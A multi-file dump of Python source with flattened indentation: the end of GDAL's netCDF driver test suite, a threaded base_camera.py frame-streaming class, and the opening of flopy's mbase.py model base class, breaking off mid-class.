def test_multipolygon_with_no_ir_NC4_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
# Almost identical to test_multipolygon_with_no_ir
# except this time, it is writing an NC4 file
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon_no_ir_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipolygon_no_ir_write_test.nc4", src, format="netCDF", datasetCreationOptions=['FORMAT=NC4']);
nc_tsrc = ogr.Open("tmp/multipolygon_no_ir_write_test.nc4")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("mpoly_shape")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
assert(fnam == "Triangle")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 0)),((3 0,4 1,3 1,3 0)))")
assert(fnam == "DoubleTriangle")
def test_multipolygon3D_NC4C_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
# This test is identical to test_multipolygon3D_write
# except it writes to NC4C
gdal.VectorTranslate("tmp/multipolygon3D_write_test.nc", src, format="netCDF", datasetCreationOptions=['FORMAT=NC4C']);
nc_tsrc = ogr.Open("tmp/multipolygon3D_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("shapes")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
# Due to ambiguities present in CF-1.8, these are actually read out as Multipolygons, not Polygons
# But when being written out, they are OGRFeature POLYGON
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0 0,1 0 1,1 1 1,0 0 0)),((0 0 0,-1 0 -1,-1 -1 -1,0 0 0)))")
assert(fnam == "Trianglies")
# This second feature has an interior ring in it
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0 0,4 0 0,4 1 1,3 1 1,3 0 0),(3.5 0.25 0,3.75 0.25 0,3.75 0.5 0.1,3.5 0.5 0.1,3.5 0.25 0)),((4 4 100,4 5 101,5 4 101,4 4 100)))")
assert(fnam == "Prismy_and_Triangly")
# This third feature is just a Polygon
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((-2 0 -5,-2 1 -6,-1 1 -6,-2 0 -5)))")
assert(fnam == "Single_Triangly")
def test_netcdf_dimension_labels_with_null():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
# Crashes with 4.1.3 of Ubuntu Precise
if gdaltest.netcdf_drv_version.startswith('4.0.') or gdaltest.netcdf_drv_version.startswith('4.1.'):
pytest.skip('Test crashes with this libnetcdf version')
with gdaltest.error_handler():
assert gdal.Open('data/dimension_labels_with_null.nc')
def test_write_multiple_layers_one_nc():
if gdaltest.netcdf_drv is None:
pytest.skip()
# tests writing multiple layers in NC3
# each geometry container a layer
# this also tests "update mode" for CF-1.8
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon_no_ir_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
gdal.VectorTranslate("tmp/mlnc.nc", src, format="netCDF");
src = gdal.OpenEx("data/netcdf-sg/write-tests/point3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
gdal.VectorTranslate("tmp/mlnc.nc", src, format="netCDF", accessMode='update');
nc_tsrc = ogr.Open("tmp/mlnc.nc")
assert(nc_tsrc.GetLayerCount() == 2)
# Test layer properties
layer = nc_tsrc.GetLayerByName("mpoly_shape")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
assert(fnam == "Triangle")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 0)),((3 0,4 1,3 1,3 0)))")
assert(fnam == "DoubleTriangle")
# Test layer properties
layer = nc_tsrc.GetLayerByName("point_collection")
assert(layer is not None)
assert(layer.GetFeatureCount() == 4)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (0.5 -0.5 -1.5)")
assert(fnam == "FishingSpot1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1 -1 -0.5)")
assert(fnam == "FishingSpot2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1.5 -1.5 0.5)")
assert(fnam == "FishingSpot3")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (2 -2 1.5)")
assert(fnam == "FishingSpot4")
def test_write_multiple_layers_one_nc_NC4():
if gdaltest.netcdf_drv is None:
pytest.skip()
# nearly identical to previous test except that
# it writes to NC4, not NC3 (changing a file from NC3 to NC4)
# and it writes them all at once (non update)
src = gdal.OpenEx("tmp/mlnc.nc", gdal.OF_VECTOR)
assert(src is not None)
gdal.VectorTranslate("tmp/mlnc4.nc4", src, format="netCDF", datasetCreationOptions=['FORMAT=NC4']);
nc_tsrc = ogr.Open("tmp/mlnc4.nc4")
assert(nc_tsrc.GetLayerCount() == 2)
# Test layer properties
layer = nc_tsrc.GetLayerByName("mpoly_shape")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
assert(fnam == "Triangle")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 0)),((3 0,4 1,3 1,3 0)))")
assert(fnam == "DoubleTriangle")
# Test layer properties
layer = nc_tsrc.GetLayerByName("point_collection")
assert(layer is not None)
assert(layer.GetFeatureCount() == 4)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (0.5 -0.5 -1.5)")
assert(fnam == "FishingSpot1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1 -1 -0.5)")
assert(fnam == "FishingSpot2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1.5 -1.5 0.5)")
assert(fnam == "FishingSpot3")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (2 -2 1.5)")
assert(fnam == "FishingSpot4")
def test_write_multiple_layers_one_nc_back_to_NC3():
if gdaltest.netcdf_drv is None:
pytest.skip()
# nearly identical to previous test except that
# it writes to from NC4 to NC3
# and it writes them all at once (non update)
# test_write_multiple_layers_one_nc writes one and then another in update mode
src = gdal.OpenEx("tmp/mlnc4.nc4", gdal.OF_VECTOR)
assert(src is not None)
gdal.VectorTranslate("tmp/mlnc_noupdate3.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/mlnc_noupdate3.nc")
assert(nc_tsrc.GetLayerCount() == 2)
# Test layer properties
layer = nc_tsrc.GetLayerByName("mpoly_shape")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
assert(fnam == "Triangle")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 0)),((3 0,4 1,3 1,3 0)))")
assert(fnam == "DoubleTriangle")
# Test layer properties
layer = nc_tsrc.GetLayerByName("point_collection")
assert(layer is not None)
assert(layer.GetFeatureCount() == 4)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (0.5 -0.5 -1.5)")
assert(fnam == "FishingSpot1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1 -1 -0.5)")
assert(fnam == "FishingSpot2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1.5 -1.5 0.5)")
assert(fnam == "FishingSpot3")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (2 -2 1.5)")
assert(fnam == "FishingSpot4")
def test_SG_NC3_field_write():
# Tests all the NC3 field writing capabilities with
# buffering.
src = gdal.OpenEx("data/netcdf-sg/write-tests/field_test_nc3.nc", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/bufft.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/bufft.nc")
assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("names_geometry")
assert(layer is not None)
assert(layer.GetFeatureCount() == 1)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
fid = feat.GetFieldAsInteger("IDS")
fnum1 = feat.GetFieldAsInteger("NUM_1")
fnum2 = feat.GetFieldAsInteger("NUM_2")
fflt = feat.GetFieldAsDouble("FL")
fdbl = feat.GetFieldAsDouble("DBL")
assert(fWkt == "POINT (1 -1)")
assert(fnam == "Guage_1")
assert(fid == 0)
assert(fnum1 == 1)
assert(fnum2 == 2)
assert(fflt == 1.5)
assert(fdbl == 99.5)
def test_states_full_layer_buffer_restrict_correctness():
# Tests whether or not having the write buffer restriction
# Writes correct data.
# Note: this is different than the Yahara version in that it also tests
# Correctness of writing buffered NC_CHARs and NC_STRINGs (NC4)
src = gdal.OpenEx("data/netcdf-sg/write-tests/cf1.8_states.json")
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/states_4K_restrict.nc", src, format="netCDF", layerCreationOptions = ['BUFFER_SIZE=4096'])
gdal.VectorTranslate("tmp/states_default_buf.nc", src, format="netCDF")
fk_ds = ogr.Open("tmp/states_4K_restrict.nc")
db_ds = ogr.Open("tmp/states_default_buf.nc")
fk_ds_layer = fk_ds.GetLayerByName("geometry_container")
db_ds_layer = db_ds.GetLayerByName("geometry_container")
assert(fk_ds_layer is not None)
assert(db_ds_layer is not None)
for feat in range(49):
lft = fk_ds_layer.GetNextFeature()
dft = db_ds_layer.GetNextFeature()
lftgeo = lft.GetGeometryRef()
dftgeo = dft.GetGeometryRef()
assert(lftgeo.Equal(dftgeo))
def test_empty_polygon_read_write():
# Tests writing features to a layer of empty polygons
src = gdal.OpenEx("data/netcdf-sg/write-tests/empty_polygon_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/empty_polygon.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/empty_polygon.nc")
assert(nc_tsrc is not None)
nc_layer = nc_tsrc.GetLayerByName("places");
assert(nc_layer.GetFeatureCount() == 2)
first = nc_layer.GetNextFeature()
assert(first.GetFieldAsString("NAMES") == "Somewhere")
assert(first.GetGeometryRef().ExportToWkt() == "POLYGON ((0 1,1 0,2 0,0 1))")
second = nc_layer.GetNextFeature()
assert(second.GetFieldAsString("NAMES") == "Everywhere")
assert(second.GetGeometryRef().IsEmpty())
def test_empty_multiline_read_write():
# Tests writing features to a layer of empty polygons
src = gdal.OpenEx("data/netcdf-sg/write-tests/empty_mline_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/empty_mline.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/empty_mline.nc")
assert(nc_tsrc is not None)
nc_layer = nc_tsrc.GetLayerByName("places");
assert(nc_layer.GetFeatureCount() == 2)
first = nc_layer.GetNextFeature()
assert(first.GetFieldAsString("NAMES") == "Somewhere")
assert(first.GetGeometryRef().ExportToWkt() == "MULTILINESTRING ((0 5,2 0))")
second = nc_layer.GetNextFeature()
assert(second.GetFieldAsString("NAMES") == "Everywhere")
assert(second.GetGeometryRef().IsEmpty())
def test_empty_multipolygon_read_write():
# Tests writing features to a layer of empty polygons
src = gdal.OpenEx("data/netcdf-sg/write-tests/empty_multipolygon_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/empty_multipolygon.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/empty_multipolygon.nc")
assert(nc_tsrc is not None)
nc_layer = nc_tsrc.GetLayerByName("places");
assert(nc_layer.GetFeatureCount() == 2)
first = nc_layer.GetNextFeature()
assert(first.GetFieldAsString("NAMES") == "Nowhere")
assert(first.GetGeometryRef().IsEmpty())
second = nc_layer.GetNextFeature()
assert(second.GetFieldAsString("NAMES") == "Somewhere")
assert(second.GetGeometryRef().ExportToWkt() == "MULTIPOLYGON (((0 0,2 0,2 2,0 2,0 0)))")
def test_states_full_layer_buffer_restrict_correctness_single_datum():
# Single datum regression test
src = gdal.OpenEx("data/netcdf-sg/write-tests/cf1.8_states.json")
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/states_4K_restrict_sd.nc", src, format="netCDF", layerCreationOptions = ['BUFFER_SIZE=4096', "GROUPLESS_WRITE_BACK=YES"])
fk_ds = ogr.Open("tmp/states_4K_restrict_sd.nc")
db_ds = ogr.Open("tmp/states_4K_restrict.nc")
fk_ds_layer = fk_ds.GetLayerByName("geometry_container")
db_ds_layer = db_ds.GetLayerByName("geometry_container")
assert(fk_ds_layer is not None)
assert(db_ds_layer is not None)
for feat in range(49):
lft = fk_ds_layer.GetNextFeature()
dft = db_ds_layer.GetNextFeature()
lftgeo = lft.GetGeometryRef()
dftgeo = dft.GetGeometryRef()
assert(lftgeo.Equal(dftgeo))
def test_netcdf_uint16_netcdf4_without_fill():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
# This dataset was created with nc_def_var_fill(cdfid, nZId, NC_NOFILL, NULL)
# Check that we don't report a nodata value
ds = gdal.Open('data/uint16_netcdf4_without_fill.nc')
assert not ds.GetRasterBand(1).GetNoDataValue()
def test_netcdf_sen3_sral_mwr_fake_standard_measurement():
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = gdal.OpenEx('data/sen3_sral_mwr_fake_standard_measurement.nc', gdal.OF_RASTER)
assert not ds
ds = gdal.OpenEx('data/sen3_sral_mwr_fake_standard_measurement.nc', gdal.OF_VECTOR)
assert ds
assert ds.GetLayerCount() == 3
lyr = ds.GetLayer(0)
assert lyr.GetName() == 'sen3_sral_mwr_fake_standard_measurement_time_01'
assert lyr.GetSpatialRef() is not None
assert lyr.GetLayerDefn().GetFieldCount() == 5
assert lyr.TestCapability(ogr.OLCFastFeatureCount) == 1
assert lyr.TestCapability(ogr.OLCRandomRead) == 1
assert lyr.TestCapability(ogr.OLCRandomWrite) == 0
assert lyr.GetFeatureCount() == 2
assert lyr.GetMetadata_Dict() == {
'alt_01_comment': 'Altitude of satellite above the reference ellipsoid',
'alt_01_long_name': 'altitude of the satellite : 1 Hz',
'alt_01_standard_name': 'height_above_reference_ellipsoid',
'alt_01_units': 'm',
'orb_alt_rate_01_comment': 'The reference surface for the orbital altitude rate is the combined mean_sea_surface/geoid surface. It is used to compute the Doppler correction on the altimeter range',
'orb_alt_rate_01_long_name': 'orbital altitude rate : 1 Hz',
'orb_alt_rate_01_units': 'm/s',
'surf_type_01_flag_meanings': 'ocean_or_semi_enclosed_sea enclosed_sea_or_lake continental_ice land',
'surf_type_01_flag_values': '{0,1,2,3}',
'surf_type_01_long_name': 'surface type : 1 Hz',
'time_01_calendar': 'gregorian',
'time_01_long_name': 'UTC: 1 Hz',
'time_01_standard_name': 'time',
'time_01_units': 'seconds since 2000-01-01 00:00:00.0',
'total_electron_content_01_long_name': 'Altimeter-derived total electron content (TECU) : 1 Hz',
'total_electron_content_01_units': 'count'
}
assert lyr.GetMetadataItem('alt_01_units') == 'm'
f = lyr.GetNextFeature()
assert f.GetGeometryRef().GetX() == pytest.approx(2.234567, 1e-7)
assert f.GetGeometryRef().GetY() == pytest.approx(49.234567, 1e-7)
assert f['time_01'] == 1.25
assert not f.IsFieldSet("surf_type_01")
assert not f.IsFieldSet("orb_alt_rate_01")
assert not f.IsFieldSet("total_electron_content_01")
f = lyr.GetNextFeature()
assert f['time_01'] == 2.25
assert f['surf_type_01'] == 1
assert f['orb_alt_rate_01'] == 0.01
assert f['total_electron_content_01'] == 10000000000.0
assert lyr.GetNextFeature() is None
assert lyr.GetNextFeature() is None
lyr.ResetReading()
assert lyr.GetNextFeature() is not None
lyr.SetSpatialFilterRect(-50,-50,-50,-50)
lyr.ResetReading()
assert lyr.GetNextFeature() is None
assert lyr.GetFeatureCount() == 0
lyr.SetSpatialFilter(None)
lyr.SetAttributeFilter('0 = 1')
lyr.ResetReading()
assert lyr.GetNextFeature() is None
assert lyr.GetFeature(0) is None
assert lyr.GetFeature(1).GetFID() == 1
assert lyr.GetFeature(3) is None
lyr = ds.GetLayer(1)
assert lyr.GetName() == 'sen3_sral_mwr_fake_standard_measurement_time_20_ku'
f = lyr.GetNextFeature()
assert not f.IsFieldSet('nb_stack_20_ku')
f = lyr.GetNextFeature()
assert f['nb_stack_20_ku'] == 1
def test_netcdf_chunked_multiple():
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = gdal.Open('data/byte_chunked_multiple.nc')
assert ds.GetRasterBand(1).GetBlockSize() == [10, 10]
assert ds.GetRasterBand(1).Checksum() == 4672
def test_netcdf_chunked_not_multiple():
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = gdal.Open('data/byte_chunked_not_multiple.nc')
assert ds.GetRasterBand(1).GetBlockSize() == [15, 6]
assert ds.GetRasterBand(1).Checksum() == 4672
def test_clean_tmp():
# [KEEP THIS AS THE LAST TEST]
# i.e. please do not add any tests after this one. Put new ones above.
# Not actually a test, just cleans up tmp...
gdaltest.clean_tmp()
pytest.skip()
|
base_camera.py
|
import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
import logging
logger = logging.getLogger('app')
# logger = logging.getLogger(__name__)
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
logger.info(f'BaseCamera: start background frame thread.')
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames(self):
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
logger.info('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
if time.time() - BaseCamera.last_access > 2:
frames_iterator.close()
logger.info('Stopping camera thread due to inactivity.')
break
BaseCamera.thread = None
|
mbase.py
|
"""
mbase module
This module contains the base model class from which
all of the other models inherit from.
"""
import abc
import os
import shutil
import threading
import warnings
import queue as Queue
from datetime import datetime
from shutil import which
from subprocess import Popen, PIPE, STDOUT
import copy
import numpy as np
from flopy import utils, discretization
from .version import __version__
from .discretization.grid import Grid
## Global variables
# Multiplier for individual array elements in integer and real arrays read by
# MODFLOW's U2DREL, U1DREL and U2DINT.
iconst = 1
# Printout flag. If >= 0 then array values read are printed in listing file.
iprn = -1
class FileDataEntry:
def __init__(self, fname, unit, binflag=False, output=False, package=None):
self.fname = fname
self.unit = unit
self.binflag = binflag
self.output = output
self.package = package
class FileData:
def __init__(self):
self.file_data = []
return
def add_file(self, fname, unit, binflag=False, output=False, package=None):
ipop = []
for idx, file_data in enumerate(self.file_data):
if file_data.fname == fname or file_data.unit == unit:
ipop.append(idx)
self.file_data.append(
FileDataEntry(
fname, unit, binflag=binflag, output=output, package=package
)
)
return
class ModelInterface:
def __init__(self):
self._mg_resync = True
self._modelgrid = None
def update_modelgrid(self):
if self._modelgrid is not None:
self._modelgrid = Grid(
proj4=self._modelgrid.proj4,
xoff=self._modelgrid.xoffset,
yoff=self._modelgrid.yoffset,
angrot=self._modelgrid.angrot,
)
self._mg_resync = True
@property
@abc.abstractmethod
def modelgrid(self):
raise NotImplementedError(
"must define modelgrid in child class to use this base class"
)
@property
@abc.abstractmethod
def packagelist(self):
raise NotImplementedError(
"must define packagelist in child class to use this base class"
)
@property
@abc.abstractmethod
def namefile(self):
raise NotImplementedError(
"must define namefile in child class to use this base class"
)
@property
@abc.abstractmethod
def model_ws(self):
raise NotImplementedError(
"must define model_ws in child class to use this base class"
)
@property
@abc.abstractmethod
def exename(self):
raise NotImplementedError(
"must define exename in child class to use this base class"
)
@property
@abc.abstractmethod
def version(self):
raise NotImplementedError(
"must define version in child class to use this base class"
)
@property
@abc.abstractmethod
def solver_tols(self):
raise NotImplementedError(
"must define version in child class to use this base class"
)
@abc.abstractmethod
def export(self, f, **kwargs):
raise NotImplementedError(
"must define export in child class to use this base class"
)
@property
@abc.abstractmethod
def laytyp(self):
raise NotImplementedError(
"must define laytyp in child class to use this base class"
)
@property
@abc.abstractmethod
def hdry(self):
raise NotImplementedError(
"must define hdry in child class to use this base class"
)
@property
@abc.abstractmethod
def hnoflo(self):
raise NotImplementedError(
"must define hnoflo in child class to use this base class"
)
@property
@abc.abstractmethod
def laycbd(self):
raise NotImplementedError(
"must define laycbd in child class to use this base class"
)
@property
@abc.abstractmethod
def verbose(self):
raise NotImplementedError(
"must define verbose in child class to use this base class"
)
@abc.abstractmethod
def check(self, f=None, verbose=True, level=1):
raise NotImplementedError(
"must define check in child class to use this base class"
)
def get_package_list(self, ftype=None):
"""
Get a list of all the package names.
Parameters
----------
ftype : str
Type of package, 'RIV', 'LPF', etc.
Returns
-------
val : list of strings
Can be used to see what packages are in the model, and can then
be used with get_package to pull out individual packages.
"""
val = []
for pp in self.packagelist:
if ftype is None:
val.append(pp.name[0].upper())
elif pp.package_type.lower() == ftype:
val.append(pp.name[0].upper())
return val
def _check(self, chk, level=1):
"""
Check model data for common errors.
Parameters
----------
f : str or file handle
String defining file name or file handle for summary file
of check method output. If a string is passed a file handle
is created. If f is None, check method does not write
results to a summary file. (default is None)
verbose : bool
Boolean flag used to determine if check method results are
written to the screen
level : int
Check method analysis level. If level=0, summary checks are
performed. If level=1, full checks are performed.
summarize : bool
Boolean flag used to determine if summary of results is written
to the screen
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow.load('model.nam')
>>> m.check()
"""
# check instance for model-level check
results = {}
for p in self.packagelist:
if chk.package_check_levels.get(p.name[0].lower(), 0) <= level:
results[p.name[0]] = p.check(
f=None,
verbose=False,
level=level - 1,
checktype=chk.__class__,
)
# model level checks
# solver check
if self.version in chk.solver_packages.keys():
solvers = set(chk.solver_packages[self.version]).intersection(
set(self.get_package_list())
)
if not solvers:
chk._add_to_summary(
"Error", desc="\r No solver package", package="model"
)
elif len(list(solvers)) > 1:
for s in solvers:
chk._add_to_summary(
"Error",
desc="\r Multiple solver packages",
package=s,
)
else:
chk.passed.append("Compatible solver package")
# add package check results to model level check summary
for r in results.values():
if (
r is not None and r.summary_array is not None
): # currently SFR doesn't have one
chk.summary_array = np.append(
chk.summary_array, r.summary_array
).view(np.recarray)
chk.passed += [
f"{r.package.name[0]} package: {psd}" for psd in r.passed
]
chk.summarize()
return chk
class BaseModel(ModelInterface):
"""
MODFLOW-based models base class.
Parameters
----------
modelname : str, default "modflowtest"
Name of the model, which is also used for model file names.
namefile_ext : str, default "nam"
Name file extension, without "."
exe_name : str, default "mf2k.exe"
Name of the modflow executable.
model_ws : str, optional
Path to the model workspace. Model files will be created in this
directory. Default is None, in which case model_ws is assigned
to the current working directory.
structured : bool, default True
Specify if model grid is structured (default) or unstructured.
verbose : bool, default False
Print additional information to the screen.
**kwargs : dict, optional
Used to define: ``xll``/``yll`` for the x- and y-coordinates of
the lower-left corner of the grid, ``xul``/``yul`` for the
x- and y-coordinates of the upper-left corner of the grid
(deprecated), ``rotation`` for the grid rotation (default 0.0),
``proj4_str`` for a PROJ string, and ``start_datetime`` for
model start date (default "1-1-1970").
"""
def __init__(
self,
modelname="modflowtest",
namefile_ext="nam",
exe_name="mf2k.exe",
model_ws=None,
structured=True,
verbose=False,
**kwargs,
):
"""Initialize BaseModel."""
super().__init__()
self.__name = modelname
self.namefile_ext = namefile_ext or ""
self._namefile = self.__name + "." + self.namefile_ext
self._packagelist = []
self.heading = ""
self.exe_name = exe_name
self._verbose = verbose
self.external_path = None
self.external_extension = "ref"
if model_ws is None:
model_ws = os.getcwd()
if not os.path.exists(model_ws):
try:
os.makedirs(model_ws)
except:
print(
f"\n{model_ws} not valid, "
f"workspace-folder was changed to {os.getcwd()}\n"
)
model_ws = os.getcwd()
self._model_ws = model_ws
self.structured = structured
self.pop_key_list = []
self.cl_params = ""
# check for reference info in kwargs
# we are just carrying these until a dis package is added
xll = kwargs.pop("xll", None)
yll = kwargs.pop("yll", None)
self._xul = kwargs.pop("xul", None)
self._yul = kwargs.pop("yul", None)
self._rotation = kwargs.pop("rotation", 0.0)
self._proj4_str = kwargs.pop("proj4_str", None)
self._start_datetime = kwargs.pop("start_datetime", "1-1-1970")
# build model discretization objects
self._modelgrid = Grid(
proj4=self._proj4_str,
xoff=xll,
yoff=yll,
angrot=self._rotation,
)
self._modeltime = None
# Model file information
self.__onunit__ = 10
# external option stuff
self.array_free_format = True
self.free_format_input = True
self.parameter_load = False
self.array_format = None
self.external_fnames = []
self.external_units = []
self.external_binflag = []
self.external_output = []
self.package_units = []
self._next_ext_unit = None
# output files
self.output_fnames = []
self.output_units = []
self.output_binflag = []
self.output_packages = []
return
@property
def modeltime(self):
raise NotImplementedError(
"must define modeltime in child class to use this base class"
)
@property
def modelgrid(self):
raise NotImplementedError(
"must define modelgrid in child class to use this base class"
)
@property
def packagelist(self):
return self._packagelist
@packagelist.setter
def packagelist(self, packagelist):
self._packagelist = packagelist
@property
def namefile(self):
return self._namefile
@namefile.setter
